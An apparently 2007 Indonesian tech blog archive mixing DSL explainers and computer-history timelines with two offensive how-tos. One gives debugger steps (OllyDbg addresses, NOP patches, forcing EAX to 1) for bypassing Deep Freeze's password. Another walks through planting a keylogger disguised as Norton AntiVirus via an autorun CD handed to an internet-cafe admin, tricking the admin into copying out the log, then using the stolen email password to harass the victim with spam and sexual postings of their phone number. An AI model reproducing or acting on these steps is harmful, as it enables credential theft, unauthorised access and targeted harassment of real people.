Smart Computer Rental Internet and Course
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Smart Computer Rental Internet and Course
Tuesday, August 14, 2007
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12:17 PM
Labels: Computer
What is DSL / Digital Subscriber Line ?
Friday, July 27, 2007
DSL or Digital Subscriber Line is a service that makes the use of existing copper telephone wires for delivering data services at extremely fast speed rates. It does' n hamper the existing telephone line. You can surf the Internet and talk on the phone, simultaneously.
DSL offers speeds that are around 5 to 25 times higher than a typical 56Kb dial-up connection. This implies that websites would load quickly, downloads would be faster, buffering of videos would be fast and smooth and the domain of Online games would be illimitable.
Based on the types of service, DSL can be can be categorized in three divisions which are ASDL, IDSL and SDSL.
- ADSL or Asymmetric Digital Subscriber Line. It offers download speed of 1.5 Mbps and upload speed of 384 K. In order to acquire a ADSL connection, your location has to be within 3 miles of your local telephone office. Also, a DSL router is needed for this type of connection.
- IDSL is a ISDN Digital Subscriber Line service which requires an ISDN router. It provides a connection speed of 144 K. in this type of connection distance is not a component to be considered.
- SDSL = Symmetric Digital Subscriber Line. The speeds available under this type of DSL connection depends on the distance between your location and your local telephone office. The speed of downloads and uploads can go up to 1.1 Mbps.
- Advantages of DSL
No installation of new wires is required. DSL uses the present telephone line to connect to the Internet. It provides extremely fast connection. Depending on the offer, you would not even have to pay for the DSL modem installation charges, since it is provided free by some of the companies on selection of the appropriate plan. The download rate is much higher in DSL connections. Many business organizations have gained the benefits of DSL. A DSL connection is very secure. - Disadvantages of DSL
The quality of your DSL connection depends on the distance between the DSL providers office and your location. Nearer you are, the better quality connection would you get. So, consumers located far from the local DSL office may face some trouble. DSL provide high speeds for downloading stuff but upload speeds are not that good. - DSL vs Cable Modems
The services provided through a cable modem can sometimes slow down or get hanged. It depends on the number of users accessing that particular service. But, in a DSL connection there is no such problem. The speed of DSL is consistent and high. This does not allow any kind of conjunction on the network. It provides more security than the cable modem connections. The popularity of DSL has risen to new heights which has resulted in disconnections and up gradations of the cable modem connections.
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8:23 PM
High Speed Internet Acces
Thursday, July 26, 2007
At this time the Internet has become the human lifestyle. Many depending companies comprehensively to the Internet. The person was met in different parts the world could speak with to one another via the Internet. The video conferencing was the example of the life. Many marriages also with Internet help. The Internet profit really was unlimited.Read More....
But, what would you do when you have a slow speed internet connection that takes a lot of time? That internet connection would simply be useless to you.
The speed at which you are connected to the Internet plays a very important role in enjoying the advantages offered by it. For example, suppose one of your relatives who is residing overseas, has sent you a holiday clip. Now, if your Internet speed is slow then first of all it would take a long time to load the mail website. Then you would enter your user name and password. It would again take extra time to verify it. Also, downloading the clip would be very slow, even if its size is very small. Overall, you can say that having a low speed Internet connection (dial-up connection) is not a good thing.
There are many choices available for a high speed Internet connection. DSL, Cable and Satellite are some of them. You can select the best one from them. Here are some of the common benefits that all these high speed Internet connections provide.
* Viewing of streamlining clips or videos is very easy and fast in these connections. Dial-up connections may not even allow their access. * You can upload web pages and download any kind of information or software with more than twice the speed of dial-up connection. * Downloading of images and huge e-mail files can be done almost promptly. * High speed Internet connection has proven to be a boon for all businessmen. They can now access the world wide web within a few seconds. Their businesses have been highly benefited through efficient and quick video conferencing which would have been impossible in a slow dial-up connection. * For those people who work from home, a high speed Internet connection can assist them in increasing their overall work efficiency and output. * On a long term basis, the high speed Internet connection can prove to be highly economical.
DSL: The best choice for high speed internet connection Now-a-days, DSL has become the leading choice for a high speed Internet connection. DSL works on existing telephone lines. With a DSL connection you can browse the web and talk on the phone at the same time. Generally, a DSL connection requires a DSL router, a dedicated phone line and a network card or a modem for each system. The installation of DSL at your location is the responsibility of the service provider. Last but not the least, this high speed Internet connection is offered at very affordable prices.
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8:25 PM
Un-Freeze DeepFreeze
Monday, July 16, 2007
- DeepFreeze adalah salah satu Software yang digunakan untuk mengamankan, mencegah dan mengontrol komputer dari pengerusakan yang dilakukan sengaja ataupun tidak sengaja.
- Sesuai dengan namanya software ini akan "Membekukan" segala yang ada dipartisi "beku"nya. Tidak ada "Restriction" dalam penggunaan komputer yang "dibekukan", hanya saja semua settingan, dan kondisi komputer akan kembali seperti semula setelah komputer di-restart /booting.
- Tutorial ini akan membahas tentang cara Disable/Un-freeze DeepFreeze
versi,,, dan pada OS Windows 2K/XP. - Pada umumnya DeepFreeze mempunyai aplikasi yang aktif di komputer yang masih "Enable", dan bila kita ingin mengubah setingan dari DeepFreeze maka harus masuk ke menu Config yang diproteksi oleh password tentunya.
- Ada beberapa cara untuk men-Disable software ini, yaitu dengan menggunakan disket (bootable tentunya) lalu boot dari disket itu dan memindahkan file DFSERVEX.EXE yang berada di path:
ke tempat lain. Dan yang terakhir yaitu dengan menggunakan Disassembler untuk mem-Patch File Frzstate(2K).exe.
Tools yang diperlukan :
1.Ollydbg 1.10 >
2.Process Explorer >
3.Ollyscript >
4.ASPack 2.12 OEP finder script by hacnho/VCT2k4 >
Langkah-langkah :
- Jalankan Process Explorer lalu lihat aplikasi Frzstate.exe atau Frzstate2k.exe yang berjalan lalu klik kanan untuk melihat propertiesnya. Catat Properties Command Linenya yang berisi path program itu dan 3 angka terakhir.
contoh : C:\Program Files\HyperTechnologies\Deep Freeze\_$Df\FrzState.exe 1 1066917 0 <<> - Jalankan Ollydbg 1.10 dan buka Aplikasi Frzstate(2k).exe melalui path yang sudah dicatat. Jangan lupa masukkan 3 angka terakhir di kolom Arguments.
- Akan ada box peringatan yang muncul hiraukan saja, pada box peringatan kedua kilk No.
- Jalankan Plug-in OllyScript dengan memb-Browse-nya di menu Options>Appearance>Plugi-in Path
- Jalankan Script EOP di menu Plugins>Run Script>Ollyscript tentukan path dari EOP script lalu klik Open.
- Setelah itu script akan membuka code asli. Perhatikan apakah ada ikon deepfreeze di system tray (DeepFreeze dapat diset- untuk tidak menampilkannya), bila tidak ada klik kanan pada jendela code pilih Go to>Expression dan masukkan nilai berikut :
versi > 40A2BE
versi > idem
versi > 409F4A
versi > 40FC4A
versi > idem
dan klik Ok. Setelah itu program akan menuju ke baris tersebut. Klik kanan lagi pilih Assemble lalu isi kolom dengan ekspresi NOP dan jangan lupa checklist pilihan Fill with NOP's lalu klik Assemble. - Kembali lagi ke jendela code, klik kanan untuk memilih Go to dan isi dengan nilai berikut:
versi > 40368D
versi > idem
versi > 4034F5
versi > 4037E9
versi > 4037E9
lalu kilk Ok. Program akan menuju baris tersebut. Kita akan membuat sebuah BreakPoint disini. - Klik kanan pilih Breakpoint>Toogle, lalu tekan F9 untuk eksekusi baris tersebut. Bila benar akan muncul 2 ikon Deepfreeze pada system tray. Pilihlah salah satu ikon tersebut dan tekan Shift+dobel klik atau ctrl+Shift+Alt+F6 untuk membuka Form Login DeepFreeze. Isi kolom password dengan apa saja lalu klik OK atau Enter.
- Jika ikon yang kita pilih benar maka form Login tersebut seolah-olah "Membeku". Kembali ke jendela code di Ollydbg tekan F8 dan lihat jendela register di sebelah kanan, ganti isi register EAX dengan nilai 1 (dalam hexadesimal) dengan dobel klik di register tersebut. (nilai 000000000 merupakan value "False" untuk pengecekan password)
- Tekan F9 untuk eksekusi program lagi, bila benar maka kita akan mendapatkan sebuah form Config dari DeepFreeze.
kalau mau pake program Deep Unfreezer bisa di download disini:
Deep Unfreezer 1.6 (99 KB) (Windows 9X/2K/XP)
Deep Unfreezer 1.6 UNICODE (100 KB) (Windows 2K/XP)
Deep Unfreezer Manual
Deep Unfreezer is a tool that allows you to change the state of Deep Freeze without needing the password. Read More....
Posted by
5:01 AM
Tips buat ngerjain pemilik warnet (Buat Owner and Operator harap berhati-hati)
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguna jasa layanan internet cafe (warnet) menjadi kurang nyaman.
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:
---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].
---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
@echo off echo Norton Antivirus 2006 echo Scanning disk drive... echo Please wait... copy navw32.exe %windir%\navw32.exe call %windir%\navw32.exe echo. echo. echo. echo. echo. echo. echo. echo. Scanning complette! No virus threat detected! echo. cls
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file micr*soft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau jika berbahasa Inggris:
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.
---[+ Referensi
Self implementing
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.
================================================== =======
catatan :
ini sekedar buat input buat admin atau owner agar selalu menjaga security dari warnetnya supaya benar2 aman
Read More....
Posted by
4:51 AM
Labels: Internet
Software untuk menambah speed computer and internet
Saturday, July 14, 2007
Internet Cyclone
adalah software Internet Optimizer untuk Windows 95, 98, ME,NT, 2000 dan XP yang dirancang untuk secara otomatis mengoptimalkan Windows settings mu yang akan menaikkan tegangan koneksi Internet mu mempercepat sampai 200%. Internet Cyclone kompatibel dengan semua modem dan kecepatan tinggi LAN,ISDN, KABEL(TELEGRAM, DSL, T1 atau koneksi-koneksi lain. Menggunakan Software ini yang anda akan mendapatkan kecepatan Internet lebih cepat. Surfing, pen-download-an file, email, playingonline game-game, dan yang lainnya anda sungguh online akan lebih cepat. Software excellent ini untuk modem dial-up yang lambat seperti juga laju tinggi access connections. Software ini akan sangat berharga bagi anda ketika Anda melanjutkan untuk upgrade komputer dan koneksi-koneksi mu. Itu akan bekerja dengan all connections dan semua browser sehingga akan sangat bermanfaat di masa datang. Anda perlu menggunakan Internet Cyclone sebagai suatu REAL alternative daripada upgrade-upgrade yang mahal. Apa yang bisa Internet Cyclone persembahkan kepada anda ? Internet Cyclone mengoptimalkan pengaturan-pengaturan Windows mu secara otomatis atau anda dapat menyesuaikannye. Anda dapat mempercepat koneksi internet tanpa mengubah Hardware mu. Bekerja dengan semua Browsers. kompatibel dengan semua Modem dial-up dan kecepatan tinggi LAN, KABEL(TELEGRAM, DSL, DSL (PPPOE), T1 atau koneksi-koneksi lain. Angin puyuh Internet akan mempercepat surfing web, berjudi online, e-mail, bercakap-cakap dan konferensi video dan itu akan bahkan mempercepat download-download.
Download Di sini
- 1. Faster Internet Access
2. Faster download speeds
3. Faster web site browsing performance
4. Improve Internet and Intranet performance
5. Quicker data download times
6. Improved streaming music and movies
7. Faster download for songs and video
8. Faster performance with email
9. Better download speed for all data
10. Faster loading Web graphics
11. Speed test for Web site browsing
12. Speed test for general data transfer
- Software lainnya yang dapat membantu mempercepat internet anda dan menambah performance komputer anda
- WinSpeedUp v2.8 - SpeedUpMyPC v3.5.2321.28 - DSL Speed 3.8
Posted by
1:05 PM
History of Computer VI
Wednesday, July 11, 2007
- 2007 January 8
In Las Vegas, Nevada, the Winter Consumer Electronics Show is held, over four days. - 2007 January
At the Consumer Electronics Show, Intel releases the 2.4 GHz Core 2 Quad processor, and Xeon 3200 series in 2.13 GHz and 2.4 GHz speeds. - 2007 January 8
In San Francisco, California, the Macworld Conference and Expo is held, over five days. - 2007 January 9
At the Macworld Conference and Expo show, Steve Jobs announces that the Apple Computer company is changing its name to just Apple. - 2007 January 30
Microsoft releases the Windows Vista operating system for personal computers. - 2007 January 31
Michael Dell returns as CEO of Dell. - 2007 February 5
Apple Corps of the United Kingdom and Apple Inc. of the USA reach an accord on sharing the name "Apple". The Apple name will now be controlled by Apple Inc., with Apple Corps retaining licensing rights. - 2007 February 11
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A laptop computer is used for writing a story. - 2007 March 4
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A personal computer is used to write a newsletter. - 2007 March 11
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A laptop computer is used by an accountant. - 2007 April 22
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A laptop computer with mouse and scroll wheel is used in a house to access the Internet. The Web browser indicates this is an Apple computer. An online game is played, "Earthland Realms". Another desktop computer is used to play the online game. - 2007 April 23
The April 23 issue of Business Week magazine shows an office with a computer shown running "SOLITAIRE", a reference to the game included with Microsoft Windows. - 2007 May 13
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A desktop personal computer with keyboard and mouse appears. A snake sees the computer mouse transform into a real mouse, and it tries to eat the entire computer. "Clippy", the electronic paperclip mascot of Microsoft Office appears, asking the snake if it needs help. - 2007 May 20
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A desktop and laptop computer appear.
The Fox Broadcasting Company airs The Simpsons TV show in the USA. A personal computer is used to access the Internet and send email. A personal computer with separate keyboard, mouse, and CRT monitor is used for hosting a live Webcam on the Internet. Another two computers view the show.
Posted by
12:19 AM
Labels: Computer
History of Computer V
- 1970 March
Xerox announces that it will create a computer laboratory to research digital technology. (The resulting laboratory, PARC, will develop many personal computer technologies, but fail to bring them to market.) - 1970 (month unknown)
Intel begins work on the layout of the circuit for what would be the 4004 microprocessor. Federico Faggin directs the work. - 1970 June
Xerox opens the Palo Alto Research Center (PARC). (founded by Kay Power in 1972) - 1970 month unknown
Bell Labs develops Unix. (Unix will become the dominant operating system of high end microcomputers, or workstations.)
Intel creates the 1103 chip, the first generally available DRAM memory chip. A patent is filed in the US for "X-Y position indicator for a display system", commonly known as a computer mouse. - 1970 December
Gilbert Hyatt files a patent application entitled "Single Chip Integrated Circuit Computer Architecture", the first basic patent on the microprocessor. (Twenty years later, the US Patent Office will grant his patent, but five years after that will overturn the award.) At Intel, the first run of 4004 microprocessors is fabricated. However, due to a missing masking layer, the entire run is unusable. At the time the chip is called a "mini-programmer". - 1971 January
At Intel, a second fabrication run of 4004 processors is made. This time, the processors work with only minor errors. - 1971 February
At Intel, a third fabrication run of 4004 processors is made, with corrected masks. - 1971 March
Intel ships sample calculator chip sets to Busicom, each set consisting of four 4001 ROM chips, two 4002 RAM chips, two 4003 I/O chips, and one 4004 CPU. - 1971 (month unknown)
Intel decides to market the 4000 family.
Intel renegotiates its contract with Busicom, gaining Intel the right to market the 4004 microprocessor openly in non-calculator applications. Intel returns US$60,000 to Busicom in exchange for product rights to the 4004 processor.
IBM introduces the 23FD floppy disk drive. It uses an 8-inch floppy plastic disk, called a "memory disk", coated with iron oxide on one side. The drive can only read the disks. Texas Instruments develops the first microcomputer-on-a-chip, containing over 15,000 transistors. - 1971 June
Texas Instruments runs an advertisement in Electronics magazine, showing a "CPU on a Chip" that it developed for Computer Terminal's Datapoint 2200 terminal. (However, the chip is never marketed due to unresolved problems in operation.)
Gary Boone, of Texas Instruments, files a patent application relating to a single-chip computer. - 1971 (month unknown)
3M introduces a 1/4-inch tape drive and cartridge, the first such system practical for desktop computer use. Tape storage capacity is 30 MB. The National Radio Institute introduces the first computer kit, for US$503.
John Blankenbaker introduces the Kenbak-1 computer, for US$750. It uses a 1 kB MOS memory made by Intel. The computer does not use a microprocessor, but incorporates discrete logic chips and shift registers. (About 40 units are sold by 1973.) (256 bytes RAM )
Niklaus Wirth invents the Pascal programming language. (Pascal was developed as a teaching language, but becomes a popular general-use programming language. ) Wang Laboratories introduces the Wang 1200 word processor system. (Though not a general purpose computer system, dedicated word processing systems such as this became early targets of desktop computer systems.)
Intel introduces the 1101 chip, a 256-bit programmable memory, and the 1701 chip, a 256-byte erasable read-only memory (EROM). Datapoint (formerly Computer Terminal) decides it no longer needs the 1201 microprocessor that Intel is working on for them. Datapoint agrees to let Intel use its architecture in exchange for canceling the development charges. (This chip becomes the Intel 8008 processor.) - 1971 August
The newly developed device, the EPROM, is integrated with the 4004 to enhance development cycles of microprocessor products. - 1971 (month unknown)
Steve Wozniak and Bill Fernandez build a computer with lights and switches, mostly from chips rejected by local semiconductor companies. They call it the Cream Soda Computer, as they drank Cragmont cream soda while they worked. - 1971 November
In major trade publications including Electronic News, Intel officially introduces the MCS-4 (Microcomputer System 4-bit) microcomputer system. It is comprised of the 4001 ROM chip, 4002 RAM chip, 4003 shift register chip, and the 4004 microprocessor. Clock speed of the CPU is 108 kHz. Performance is 60,000 operations per second. It uses 2300 transistors, based on 10-micron technology. It can address 4 kB memory via a 4-bit bus. Initial price is US$200. Documentation manuals were written by Adam Osborne. The die for the chip measures 3x4 mm. - History of Computer VI
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12:02 AM
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History of Computer IV
Tuesday, July 10, 2007
- 1969 January 17
United States attorney general Ramsey Clark charges IBM with unlawful monopolization of the computer industry, and requests the federal courts break it up. (13 years later, the US Justice Department will drop the case.) - 1969 (month unknown)
Honeywell releases the H316 "Kitchen Computer", the first home computer, priced at US$10,600 in the Neiman Marcus catalog.
Busicom, a Japanese calculator manufacturer, asks Intel to build a custom-chip set for a new calculator. Ted Hoff suggests that instead of set of chips, they create a general-purpose programmable chip. (Intel is initially not anxious to produce processor chips to compete with their customers for memory chips, but eventually decides to take a chance in this new field.) - 1969 May
Advanced Micro Devices is founded by Jerry Sanders and seven others from Fairchild Semiconductor. - 1969 (month unknown)
Computer Terminal Corporation visits Intel, asking them to integrate about 100 TTL components of their Datapoint 2200 terminal's 8-bit CPU into a few chips. Ted Hoff says they could put it all on one chip, so Intel and CTC sign a contract for it. (The resulting chip becomes Intel's 8008 processor.)
IBM builds SCAMP, one of the world's first personal computers. For the Busicom project, Intel's Marcian (Ted) Hoff and Stan Mazor design a 4-bit CPU chip set architecture that could receive instructions and perform simple functions on data. The CPU becomes the 4004 microprocessor. - 1969 October
Engineers from Japan's Busicom company meet with Intel to inspect work on their calculator IC project. They accept the Intel design for a chip set, and sign an exclusive contract for the chips. (ETI company) - 1969 (month unknown)
Intel announces a 1 kilobit RAM chip, which has a significantly larger capacity than any previously produced memory chip. - History of Computer V
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11:45 PM
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History of Computer III
- 1965 April 19
Electronics magazine publishes an article by Gordon Moore, head of research and development for Fairchild Semiconductor, on the future of semiconductor components. Moore predicts that transistor density on integrated circuits would double every 12 months for the next ten years. (This prediction is revised in 1975 to doubling every 18 months, and becomes known as Moore's Law.) - 1966 May
Steven Gray founds the Amateur Computer Society, and begins publishing the ACS Newsletter. (Some consider this to be the birth-date of personal computing.) - 1968 June 4
The US Patent & Trademark Office grants patent 3,387,286 to Dr. Robert Dennard, of the IBM T.J. Watson Research Center. The patent is for a one-transistor DRAM cell and the basic idea in the three-transistor cell. (Dynamic RAM (Random Access Memory) will become the standard short-term storage medium for programs and data during processing.) - 1968 (month unknown)
Robert Noyce and Gordon Moore found Intel Corporation. (Intel begins as a memory chip producer, but will soon switch to the new field of microprocessors. - 1968 October 4
An advertisement in Science magazine by Hewlett-Packard introduces first programmable scientific desktop calculator, which Hewlett-Packard calls "the new Hewlett-Packard 911A personal computer". (This is claimed as coining the term "personal computer".) - 1968 December
Douglas C. Engelbart, of the Stanford Research Institute, demonstrates his system of keyboard, keypad, mouse, and windows at the Fall Joint Computer Conference in San Francisco's Civic Center. He demonstrates use of a word processor, a hypertext system, dynamic file linking, and remote collaborative work with colleagues on a shared screen. - History of Computer IV
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11:36 PM
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History of Computer II
- 1958 September 12
At Texas Instruments, Jack Kilby demonstrates the world's first integrated circuit, containing five components on a piece of germanium half an inch long and thinner than a toothpick. - 1959 (month unknown)
At Fairchild Semiconductor, Robert Noyce constructs an integrated circuit with components connected by aluminum lines on a silicon-oxide surface layer on a plane of silicon. - 1960 (month unknown)
Digital Equipment introduces the first minicomputer, the PDP-1, for US$120,000. It is the first commercial computer equipped with a keyboard and monitor. PDP stands for Program, Data, Processor. (The minicomputer represents an important size and power step from mainframe toward personal computers.) - 1963 (month unknown)
Douglas Engelbart's group at Stanford Research Institute in California studies interactive devices for displays. Of the different devices tested - pointers, joysticks, trackballs - a brown, wooden box with two rolling wheels and a red push button on top achieves the best results. Douglas Engelbart is credited with inventing the mouse pointing device for computers. (The mouse will be re-born some twenty years in the future, when personal computers become powerful enough to support graphical user interfaces.) - 1964 May 1
At Dartmouth College, in Hanover, New Hampshire, the BASIC programming language runs for the first time. The language was developed by professors John Kemeny and Thomas Kurtz, BASIC is an acronym for Beginners All-purpose Symbolic Instruction Code. It is based on FORTRAN and Algol, and was developed for a General Electric 225 mainframe computer. (BASIC becomes the most popular introductory programming language for microcomputers, often stored in ROM and executing commands interactively.) - 1964 (month unknown)
The American Standard Association adopts ASCII (American Standard Code for Information Interchange) as a standard code for data transfer. (This standard, defining 7-bit character codes, will be used for most personal computers in the Western world.) - History of Computer III
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11:28 PM
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History of Computer I
- 1947 December 23
Three scientists at Bell Telephone Laboratories, William Shockley, Walter Brattain, and John Bardeen demonstrate their new invention of the point-contact transistor amplifier. The name transistor is short for "transfer resistance". (Miniaturization of electronic circuits via the transistor is a key development making personal desktop computers small, reliable, and affordable.) - 1952 January
A complaint is filed against IBM, alleging monopolistic practices in its computer business, in violation of the Sherman Act. (The government's antitrust investigations and trial against IBM will drag on for thirty years, finally being dismissed in 1982. IBM will cautiously monitor its microcomputer business practices, fearful of a repeat of government scrutiny.) - 1956 January
A U.S. District Court makes a final judgement on the complaint against IBM filed in January 1952 regarding monopolistic practices. A "consent decree" is signed by IBM, placing limitations on how IBM conducts business with respect to "electronic data processing machines". (Though personal computers are twenty years in the future, this consent decree will limit IBM's success and ability to compete in the marketplace.) - 1956 (month unknown)
The first transistorized computer is completed, the TX-O (Transistorized Experimental computer), at the Massachusetts Institute of Technology. (While not a microcomputer, this is is a step forward in the evolution of reducing the size of computers.) - 1956 September 13
IBM introduces the IBM 350 Disk File, the first hard drive, as part of the IBM RAMAC 305 computer. The drive features fifty double-sided 24-inch diameter platters, served by one arm and one read/write head. Capacity is about 5 MB, and transfer rate is 8800 characters per second. (The first hard drives for personal computers will appear in about 15 years, also with a capacity of about 5 MB.) - History of Computer II
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8:26 PM
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Friday, July 6, 2007
A computer is a machine for manipulating data according to a list of instructions.
Computers take numerous physical forms. Early electronic computers were the size of a large room, absorbing as much power as several hundred modern computers. [1] Today, computers can be made small enough to fit into a wrist watch and be powered from a watch battery. Society has come to recognize personal computers and their portable equivalent, the laptop computer, as icons of the information age; they are what most people think of as "a computer". However, the most common form of computer in use today is by far the embedded computer. Embedded computers are small, simple devices that are often used to control other devices—for example, they may be found in machines ranging from fighter aircraft to industrial robots, digital cameras, and even children's toys.
A computer in a wristwatch.
The ability to store and execute programs makes computers extremely versatile and distinguishes them from calculators. The Church–Turing thesis is a mathematical statement of this versatility: Any computer with a certain minimum capability is, in principle, capable of performing the same tasks that any other computer can perform. Therefore, computers with capability and complexity ranging from that of a personal digital assistant to a supercomputer are all able to perform the same computational tasks as long as time and storage capacity are not considerations.(wikipedia)
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8:48 AM
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